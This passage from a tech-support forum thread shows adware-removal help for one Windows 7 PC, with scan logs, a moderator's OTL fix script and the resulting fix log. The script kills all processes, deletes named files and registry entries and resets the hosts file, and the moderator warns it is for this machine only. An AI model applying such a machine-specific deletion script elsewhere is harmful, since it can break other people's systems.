SRV:64bit: - [2009/07/13 17:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:64bit: - [2012/06/02 14:19:43 | 002,428,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:64bit: - [2010/11/20 05:26:07 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:64bit: - [2009/07/13 17:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)
SRV:64bit: - [2010/11/20 05:27:28 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

< %SYSTEMDRIVE%\*.exe >

< c:\program files (x86)\Google\Desktop >
[2009/07/13 21:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009/07/13 21:08:49 | 000,032,610 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2011/06/10 17:33:53 | 000,000,900 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
[2011/06/10 17:33:54 | 000,000,904 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
[2012/08/10 13:22:55 | 000,000,922 | ---- | C] () -- C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000Core.job
[2012/08/10 13:22:56 | 000,000,944 | ---- | C] () -- C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-538650268-2924358156-1730836174-1000UA.job
[2013/01/15 05:19:20 | 000,000,830 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job
[2013/05/20 13:55:02 | 000,000,348 | ---- | C] () -- C:\Windows\Tasks\HPCeeScheduleForJon Lowry.job

< c:\program files\Google\Desktop >

< dir "%systemdrive%\*" /S /A:L /C >
Volume in drive C has no label.
Volume Serial Number is 2E10-9F21
Directory of C:\
07/13/2009 09:08 PM <JUNCTION> Documents and Settings [C:\Users]
0 File(s) 0 bytes
Directory of C:\ProgramData
07/13/2009 09:08 PM <JUNCTION> Application Data [C:\ProgramData]
07/13/2009 09:08 PM <JUNCTION> Desktop [C:\Users\Public\Desktop]
07/13/2009 09:08 PM <JUNCTION> Documents [C:\Users\Public\Documents]
07/13/2009 09:08 PM <JUNCTION> Favorites [C:\Users\Public\Favorites]
07/13/2009 09:08 PM <JUNCTION> Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
07/13/2009 09:08 PM <JUNCTION> Templates [C:\ProgramData\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users
07/13/2009 09:08 PM <SYMLINKD> All Users [C:\ProgramData]
07/13/2009 09:08 PM <JUNCTION> Default User [C:\Users\Default]
0 File(s) 0 bytes
Directory of C:\Users\Administrator.WOLFLING
03/11/2013 12:33 PM <JUNCTION> Application Data [C:\Users\Administrator.WOLFLING\AppData\Roaming]
03/11/2013 12:33 PM <JUNCTION> Cookies [C:\Users\Administrator.WOLFLING\AppData\Roaming\Microsoft\Windows\Cookies]
03/11/2013 12:33 PM <JUNCTION> Local Settings [C:\Users\Administrator.WOLFLING\AppData\Local]
03/11/2013 12:33 PM <JUNCTION> My Documents [C:\Users\Administrator.WOLFLING\Documents]
03/11/2013 12:33 PM <JUNCTION> NetHood [C:\Users\Administrator.WOLFLING\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
03/11/2013 12:33 PM <JUNCTION> PrintHood [C:\Users\Administrator.WOLFLING\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
03/11/2013 12:33 PM <JUNCTION> Recent [C:\Users\Administrator.WOLFLING\AppData\Roaming\Microsoft\Windows\Recent]
03/11/2013 12:33 PM <JUNCTION> SendTo [C:\Users\Administrator.WOLFLING\AppData\Roaming\Microsoft\Windows\SendTo]
03/11/2013 12:33 PM <JUNCTION> Start Menu [C:\Users\Administrator.WOLFLING\AppData\Roaming\Microsoft\Windows\Start Menu]
03/11/2013 12:33 PM <JUNCTION> Templates [C:\Users\Administrator.WOLFLING\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Administrator.WOLFLING\AppData\Local
03/11/2013 12:33 PM <JUNCTION> Application Data [C:\Users\Administrator.WOLFLING\AppData\Local]
03/11/2013 12:33 PM <JUNCTION> History [C:\Users\Administrator.WOLFLING\AppData\Local\Microsoft\Windows\History]
03/11/2013 12:33 PM <JUNCTION> Temporary Internet Files [C:\Users\Administrator.WOLFLING\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Administrator.WOLFLING\Documents
03/11/2013 12:33 PM <JUNCTION> My Music [C:\Users\Administrator.WOLFLING\Music]
03/11/2013 12:33 PM <JUNCTION> My Pictures [C:\Users\Administrator.WOLFLING\Pictures]
03/11/2013 12:33 PM <JUNCTION> My Videos [C:\Users\Administrator.WOLFLING\Videos]
0 File(s) 0 bytes
Directory of C:\Users\All Users
07/13/2009 09:08 PM <JUNCTION> Application Data [C:\ProgramData]
07/13/2009 09:08 PM <JUNCTION> Desktop [C:\Users\Public\Desktop]
07/13/2009 09:08 PM <JUNCTION> Documents [C:\Users\Public\Documents]
07/13/2009 09:08 PM <JUNCTION> Favorites [C:\Users\Public\Favorites]
07/13/2009 09:08 PM <JUNCTION> Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
07/13/2009 09:08 PM <JUNCTION> Templates [C:\ProgramData\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Default
07/13/2009 09:08 PM <JUNCTION> Application Data [C:\Users\Default\AppData\Roaming]
07/13/2009 09:08 PM <JUNCTION> Local Settings [C:\Users\Default\AppData\Local]
07/13/2009 09:08 PM <JUNCTION> My Documents [C:\Users\Default\Documents]
07/13/2009 09:08 PM <JUNCTION> NetHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
07/13/2009 09:08 PM <JUNCTION> PrintHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
07/13/2009 09:08 PM <JUNCTION> Recent [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent]
07/13/2009 09:08 PM <JUNCTION> SendTo [C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo]
07/13/2009 09:08 PM <JUNCTION> Start Menu [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu]
07/13/2009 09:08 PM <JUNCTION> Templates [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Default\AppData\Local
07/13/2009 09:08 PM <JUNCTION> Application Data [C:\Users\Default\AppData\Local]
07/13/2009 09:08 PM <JUNCTION> History [C:\Users\Default\AppData\Local\Microsoft\Windows\History]
07/13/2009 09:08 PM <JUNCTION> Temporary Internet Files [C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Default\Documents
07/13/2009 09:08 PM <JUNCTION> My Music [C:\Users\Default\Music]
07/13/2009 09:08 PM <JUNCTION> My Pictures [C:\Users\Default\Pictures]
07/13/2009 09:08 PM <JUNCTION> My Videos [C:\Users\Default\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Jon Lowry
01/23/2011 02:19 AM <JUNCTION> Application Data [C:\Users\Jon Lowry\AppData\Roaming]
01/23/2011 02:19 AM <JUNCTION> Cookies [C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Cookies]
01/23/2011 02:19 AM <JUNCTION> Local Settings [C:\Users\Jon Lowry\AppData\Local]
01/23/2011 02:19 AM <JUNCTION> My Documents [C:\Users\Jon Lowry\Documents]
01/23/2011 02:19 AM <JUNCTION> NetHood [C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
01/23/2011 02:19 AM <JUNCTION> PrintHood [C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
01/23/2011 02:19 AM <JUNCTION> Recent [C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Recent]
01/23/2011 02:19 AM <JUNCTION> SendTo [C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\SendTo]
01/23/2011 02:19 AM <JUNCTION> Start Menu [C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Start Menu]
01/23/2011 02:19 AM <JUNCTION> Templates [C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Jon Lowry\AppData\Local
01/23/2011 02:19 AM <JUNCTION> Application Data [C:\Users\Jon Lowry\AppData\Local]
01/23/2011 02:19 AM <JUNCTION> History [C:\Users\Jon Lowry\AppData\Local\Microsoft\Windows\History]
01/23/2011 02:19 AM <JUNCTION> Temporary Internet Files [C:\Users\Jon Lowry\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Jon Lowry\Bitcasa
07/17/2012 05:51 PM <JUNCTION> Fate-Stay Night [\??\Volume{d6cc17c5-1734-4085-bce7-964f1e9f5de9}\]
05/31/2012 07:43 PM <JUNCTION> PDFs [\??\Volume{d6cc17c5-1731-4085-bce7-964f1e9f5de9}\]
07/17/2012 06:06 PM <JUNCTION> RandysFlix [\??\Volume{d6cc17c5-173c-4085-bce7-964f1e9f5de9}\]
07/17/2012 05:51 PM <JUNCTION> Sample Videos [\??\Volume{d6cc17c5-1735-4085-bce7-964f1e9f5de9}\]
07/17/2012 05:51 PM <JUNCTION> Shared books [\??\Volume{d6cc17c5-1730-4085-bce7-964f1e9f5de9}\]
07/17/2012 05:51 PM <JUNCTION> The Girl With A Dragon Tattoo 2011 DVDSCR XviD AC3-FTW [\??\Volume{d6cc17c5-1736-4085-bce7-964f1e9f5de9}\]
07/17/2012 06:06 PM <JUNCTION> WrongTurn4BloodyBeginnings.mp4 [\??\Volume{d6cc17c5-1733-4085-bce7-964f1e9f5de9}\]
0 File(s) 0 bytes
Directory of C:\Users\Jon Lowry\Documents
01/23/2011 02:19 AM <JUNCTION> My Music [C:\Users\Jon Lowry\Music]
01/23/2011 02:19 AM <JUNCTION> My Pictures [C:\Users\Jon Lowry\Pictures]
01/23/2011 02:19 AM <JUNCTION> My Videos [C:\Users\Jon Lowry\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Mcx1-WOLFLING.WOLFLING
05/18/2013 09:18 PM <JUNCTION> Application Data [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Roaming]
05/18/2013 09:18 PM <JUNCTION> Cookies [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Roaming\Microsoft\Windows\Cookies]
05/18/2013 09:18 PM <JUNCTION> Local Settings [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Local]
05/18/2013 09:18 PM <JUNCTION> My Documents [C:\Users\Mcx1-WOLFLING.WOLFLING\Documents]
05/18/2013 09:18 PM <JUNCTION> NetHood [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
05/18/2013 09:18 PM <JUNCTION> PrintHood [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
05/18/2013 09:18 PM <JUNCTION> Recent [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Roaming\Microsoft\Windows\Recent]
05/18/2013 09:18 PM <JUNCTION> SendTo [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Roaming\Microsoft\Windows\SendTo]
05/18/2013 09:18 PM <JUNCTION> Start Menu [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Roaming\Microsoft\Windows\Start Menu]
05/18/2013 09:18 PM <JUNCTION> Templates [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Local
05/18/2013 09:18 PM <JUNCTION> Application Data [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Local]
05/18/2013 09:18 PM <JUNCTION> History [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Local\Microsoft\Windows\History]
05/18/2013 09:18 PM <JUNCTION> Temporary Internet Files [C:\Users\Mcx1-WOLFLING.WOLFLING\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Mcx1-WOLFLING.WOLFLING\Documents
05/18/2013 09:18 PM <JUNCTION> My Music [C:\Users\Mcx1-WOLFLING.WOLFLING\Music]
05/18/2013 09:18 PM <JUNCTION> My Pictures [C:\Users\Mcx1-WOLFLING.WOLFLING\Pictures]
05/18/2013 09:18 PM <JUNCTION> My Videos [C:\Users\Mcx1-WOLFLING.WOLFLING\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Public\Documents
07/13/2009 09:08 PM <JUNCTION> My Music [C:\Users\Public\Music]
07/13/2009 09:08 PM <JUNCTION> My Pictures [C:\Users\Public\Pictures]
07/13/2009 09:08 PM <JUNCTION> My Videos [C:\Users\Public\Videos]
0 File(s) 0 bytes
Total Files Listed:
0 File(s) 0 bytes
88 Dir(s) 158,090,575,872 bytes free

========== Alternate Data Streams ==========

@Alternate Data Stream - 178 bytes -> C:\ProgramData\Temp:BF3D62E7
@Alternate Data Stream - 133 bytes -> C:\ProgramData\Temp:0B4227B4
@Alternate Data Stream - 120 bytes -> C:\ProgramData\Temp:373E1720

< End of report >
  • 0

#4
Essexboy

Essexboy

    GeekU Moderator

  • GeekU Moderator
  • 62,615 posts
Well that cleared a fair amount of rubbish :) Lets now get the rest, on completion of this can you let me know how the computer is behaving

Are you using AVG or Avast as your antivirus ?

Warning This fix is only relevant for this system and no other, using on another computer may cause problems

Be advised that when the fix commences it will shut down all running processes and you may lose the desktop and icons, they will return on reboot

Run OTL
  • Under the Custom Scans/Fixes box at the bottom, paste in the following
    Posted Image
:Commands
[CREATERESTOREPOINT]

:OTL
FF - prefs.js..extensions.enabledAddons: %7B2A47DBFD-567F-4159-AD6A-B0D9CF6CCDFC%7D:2.0
FF - prefs.js..extensions.enabledAddons: %7B8f02605d-be4e-41ba-bd00-c39a59c46919%7D:10.22.5.10
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@real.com/nsJSRealPlayerPlugin;version=: File not found
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{C4CFC0DE-134F-4466-B2A2-FF7C59A8BFAD}: C:\PROGRAM FILES\UPDATER BY SWEETPACKS\FIREFOX
O2:64bit: - BHO: (Download keepeR) - {69E81F82-21F6-0F27-3F07-7DA9AD036591} - C:\Program Files (x86)\Download keepeR\SwGMzO4Dk.x64.dll ()
O2 - BHO: (TBSB06948 Class) - {2C776F39-2849-4D43-AEF3-C2F8476BC90A} - C:\Program Files (x86)\Multimedia Toolbar\tbcore3.dll ()
O3 - HKLM\..\Toolbar: (Multimedia Toolbar) - {968B9C5F-9D79-3863-CF0A-0E80D812E4C5} - C:\Program Files (x86)\Multimedia Toolbar\tbcore3.dll ()
O4 - HKU\S-1-5-21-538650268-2924358156-1730836174-1000..\Run: [DownBook] "C:\Users\Jon Lowry\AppData\Local\DownBook\DownBook.exe" 8f0d5b815fad402afc4e40d7cc42fc26 12 File not found
[2013/12/06 00:09:49 | 000,000,000 | ---D | C] -- C:\Users\Jon Lowry\AppData\Local\Mobogenie
[2013/12/06 00:09:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mobogenie
[2013/12/06 00:04:40 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SecretSauce
[2013/12/04 14:13:33 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Multimedia Toolbar

:Files
C:\Program Files (x86)\Download keepeR
C:\PROGRAM FILES\UPDATER BY SWEETPACKS

:Commands
[resethosts]
[emptytemp]
[Reboot]
  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done
  • Open OTL again and click the Quick Scan button. Post the log it produces in your next reply.

  • 0

#5
bigredyeeha

bigredyeeha

    Member

  • Member
  • PipPip
  • 33 posts
Yes, we are trying to use AVG, but it's blocked... The computer is running much better, but it's still responding slow..


All processes killed
========== COMMANDS ==========
Restore point Set: OTL Restore Point
========== OTL ==========
Prefs.js: %7B2A47DBFD-567F-4159-AD6A-B0D9CF6CCDFC%7D:2.0 removed from extensions.enabledAddons
Prefs.js: %7B8f02605d-be4e-41ba-bd00-c39a59c46919%7D:10.22.5.10 removed from extensions.enabledAddons
Registry key HKEY_LOCAL_MACHINE\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin\ not found.
File C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll not found.
Registry key HKEY_LOCAL_MACHINE\Software\MozillaPlugins\@real.com/nsJSRealPlayerPlugin;version=\ not found.
Registry key HKEY_CURRENT_USER\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin\ not found.
File C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll not found.
64bit-Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{69E81F82-21F6-0F27-3F07-7DA9AD036591}\ not found.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{69E81F82-21F6-0F27-3F07-7DA9AD036591}\ not found.
File C:\Program Files (x86)\Download keepeR\SwGMzO4Dk.x64.dll not found.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2C776F39-2849-4D43-AEF3-C2F8476BC90A}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2C776F39-2849-4D43-AEF3-C2F8476BC90A}\ not found.
File C:\Program Files (x86)\Multimedia Toolbar\tbcore3.dll not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\{968B9C5F-9D79-3863-CF0A-0E80D812E4C5} not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{968B9C5F-9D79-3863-CF0A-0E80D812E4C5}\ not found.
File C:\Program Files (x86)\Multimedia Toolbar\tbcore3.dll not found.
Registry value HKEY_USERS\S-1-5-21-538650268-2924358156-1730836174-1000\Software\Microsoft\Windows\CurrentVersion\Run\\DownBook not found.
Folder C:\Users\Jon Lowry\AppData\Local\Mobogenie\ not found.
Folder C:\Program Files (x86)\Mobogenie\ not found.
Folder C:\Program Files (x86)\SecretSauce\ not found.
Folder C:\Program Files (x86)\Multimedia Toolbar\ not found.
========== FILES ==========
File\Folder C:\Program Files (x86)\Download keepeR not found.
File\Folder C:\PROGRAM FILES\UPDATER BY SWEETPACKS not found.
========== COMMANDS ==========
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYTEMP]

User: Administrator
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Administrator.WOLFLING
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Java cache emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Jon Lowry
->Temp folder emptied: 200758 bytes
->Temporary Internet Files folder emptied: 38186 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Google Chrome cache emptied: 140536025 bytes
->Flash cache emptied: 0 bytes

User: Mcx1-WOLFLING
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes

User: Mcx1-WOLFLING.WOLFLING
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Public
->Temp folder emptied: 0 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 2975325 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
%systemroot%\sysnative\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment folder emptied: 0 bytes
RecycleBin emptied: 492697 bytes

Total Files Cleaned = 138.00 mb


OTL by OldTimer - Version 3.2.69.0 log created on 12092013_010320

Files\Folders moved on Reboot...
C:\Users\Jon Lowry\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • 0

#6
Essexboy

Essexboy

    GeekU Moderator

  • GeekU Moderator
  • 62,615 posts
OK lets tackle AVG next

First download a fresh copy of AVG to your desktop
Then download the correct removal tool for AVG to your desktop

Uninstall AVG from control Panel and on completion of the reboot run the uninstall tool

Then install AVG

FINALLY

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.

  • 0

#7
bigredyeeha

bigredyeeha

    Member

  • Member
  • PipPip
  • 33 posts
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-12-2013 01
Ran by Jon Lowry at 2013-12-10 19:09:44
Running from C:\Users\Jon Lowry\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

AV: AVG Internet Security 2014 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Internet Security 2014 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
FW: AVG Internet Security 2014 (Disabled) {36AFA1E1-4CDC-7EF8-11EE-C77C3581ABA2}

==================== Installed Programs ======================

3D Home Architect Home Design Deluxe 6 (x32 Version: 6.00.0000)
64 Bit HP CIO Components Installer (Version: 6.2.2)
AC3Filter (remove only) (x32)
Acrobat.com (x32 Version: 1.6.65)
Adobe Acrobat 5.0 (x32 Version: 5.0)
Adobe AIR (x32 Version: 1.5.3.9120)
Adobe Community Help (x32 Version: 3.0.0)
Adobe Community Help (x32 Version: 3.0.0.400)
Adobe Flash Player 11 ActiveX (x32 Version: 11.9.900.117)
Adobe Flash Player 11 Plugin (x32 Version: 11.9.900.152)
Adobe Media Player (x32 Version: 1.8)
Adobe Photoshop CS5 (x32 Version: 12.0)
Adobe Reader X (10.1.2) (x32 Version: 10.1.2)
Adobe Shockwave Player 11.5 (x32 Version: 11.5.7.609)
Aimersoft DRM Media Converter(Build 1.4.7.2) (x32)
Akamai NetSession Interface (HKCU)
Akamai NetSession Interface Service (x32)
Any Video Converter 5.0.9 (x32)
AnyDVD (x32 Version: 6.7.9.0)
avast! Free Antivirus (x32 Version: 9.0.2008)
Aventail Access Manager (HKCU Version: 10.62.196)
Aventail Access Manager (x32 Version: 10.62.196)
Aventail Connect (Version: 10.62.320)
AVG 2014 (Version: 14.0.3658)
AVG 2014 (Version: 14.0.4259)
AVG 2014 (Version: 2014.0.4259)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95)
Bing Rewards Client Installer (x32 Version: 16.0.345.0)
Blackhawk Striker 2 (x32 Version: 2.2.0.95)
Bonjour (Version: 2.0.2.0)
Bonjour Print Services (Version: 2.0.2.0)
Broadcom 802.11 Wireless LAN Adapter (Version: 5.60.350.6)
Build-a-lot 2 (x32 Version: 2.2.0.95)
calibre (x32 Version: 1.14.0)
CCleaner (Version: 3.27)
Chuzzle Deluxe (x32 Version: 2.2.0.95)
CinemaNow Media Manager (x32 Version: 1.9.1.105)
CloneCD (x32)
CloneDVD2 (x32 Version: 2.9.2.8)
Combined Community Codec Pack 2009-09-09 (x32 Version: 2009.09.09.0)
CyberLink DVD Suite (x32 Version: 7.0.3003)
CyberLink MediaShow (x32 Version: 5.0.1616)
CyberLink PowerDVD 9 (x32 Version: 9.0.1.4217)
CyberLink YouCam (x32 Version: 3.1.3130)
D3DX10 (x32 Version: 15.4.2368.0902)
Define Ext (HKCU Version: 8)
Definition Update for Microsoft Office 2013 (KB2760587) 64-Bit Edition
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95)
DivX Setup (x32 Version: 2.5.0.11)
Dora's Carnival Adventure (x32 Version: 2.2.0.95)
Dropbox (HKCU Version: 2.0.26)
Elcomsoft Wireless Security Auditor (x32 Version: 4.0.211.448)
Energy Star Digital Logo (x32 Version: 1.0.1)
Escape Rosecliff Island (x32 Version: 2.2.0.95)
ESU for Microsoft Windows 7 (x32 Version: 1.0.0)
Facebook Video Calling 1.2.0.287 (x32 Version: 1.2.287)
Family Tree Maker 2011 (x32 Version: 20.0.368)
Family Tree Maker 2012 (x32 Version: 21.0.388)
FATE (x32 Version: 2.2.0.95)
Final Drive Nitro (x32 Version: 2.2.0.95)
Google Chrome (x32 Version: 31.0.1650.63)
Google Earth (x32 Version: 7.1.1.1888)
Google Update Helper (x32 Version: 1.3.22.3)
Heroes of Hellas 2 - Olympia (x32 Version: 2.2.0.95)
Hewlett-Packard ACLM.NET v1.2.1.1 (x32 Version: 1.00.0000)
Horizon v2.7.1.4 (x32 Version: 2.7.1.4)
HP Advisor (x32 Version: 3.4.10262.3295)
HP Customer Experience Enhancements (x32 Version: 6.0.1.7)
HP Documentation (x32 Version: 1.1.0.0)
HP Game Console (x32)
HP Games (x32 Version: 1.0.1.3)
HP MediaSmart CinemaNow 2.0 (x32 Version: 2.0)
HP Photo Creations (x32 Version: 1.0.0.3611)
HP Power Manager (x32 Version: 1.4.7)
HP Quick Launch (x32 Version: 2.6.3)
HP Setup (x32 Version: 8.1.4186.3400)
HP Software Framework (x32 Version: 4.1.13.1)
HP Support Assistant (x32 Version: 7.0.39.15)
HP Update (x32 Version: 5.002.002.002)
HP Wireless Assistant (Version: 4.0.9.0)
InstaCodecs (x32 Version: 1.0)
Intel® Control Center (x32 Version: 1.2.1.1007)
Intel® Graphics Media Accelerator Driver (x32 Version: 8.15.10.2131)
Intel® Management Engine Components (x32 Version: 6.0.0.1179)
Intel® Rapid Storage Technology (x32 Version: 9.6.2.1001)
iSEEK AnswerWorks English Runtime (x32 Version: 010.000.0101)
Java 7 Update 45 (x32 Version: 7.0.450)
Java Auto Updater (x32 Version: 2.1.9.8)
Jewel Quest 3 (x32 Version: 2.2.0.95)
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.95)
Junk Mail filter update (x32 Version: 15.4.3502.0922)
LabelPrint (x32 Version: 2.5.2907)
Malwarebytes Anti-Malware version 1.75.0.1300 (x32 Version: 1.75.0.1300)
MasterCook Deluxe 9 (x32 Version: 9.0.000)
Mesh Runtime (x32 Version: 15.4.5722.2)
Messenger Companion (x32 Version: 15.4.3502.0922)
Microsoft .NET Framework 1.1 (x32 Version: 1.1.4322)
Microsoft .NET Framework 1.1 (x32)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319)
Microsoft .NET Framework 4 Multi-Targeting Pack (x32 Version: 4.0.30319)
Microsoft Access MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Access Setup Metadata MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Application Error Reporting (Version: 12.0.6015.5000)
Microsoft Application Error Reporting (x32 Version: 12.0.6012.5000)
Microsoft DCF MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Default Manager (x32 Version: 2.2.114.0)
Microsoft Excel MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Groove MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Help Viewer 1.0 (Version: 1.0.30319)
Microsoft InfoPath MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Lync MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Office 32-bit Components 2013 (Version: 15.0.4420.1017)
Microsoft Office File Validation Add-In (x32 Version: 14.0.5130.5003)
Microsoft Office OSM MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Office OSM UX MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Office Professional Plus 2013 (Version: 15.0.4420.1017)
Microsoft Office Proofing (English) 2013 (Version: 15.0.4420.1017)
Microsoft Office Proofing Tools 2013 - English (Version: 15.0.4420.1017)
Microsoft Office Proofing Tools 2013 - Español (Version: 15.0.4420.1017)
Microsoft Office Shared 32-bit MUI (English) 2013 (Version: 15.0.4420.1017)
Microsoft Office Shared MUI (English) 2013 (Version: 15.0.4420.1017)
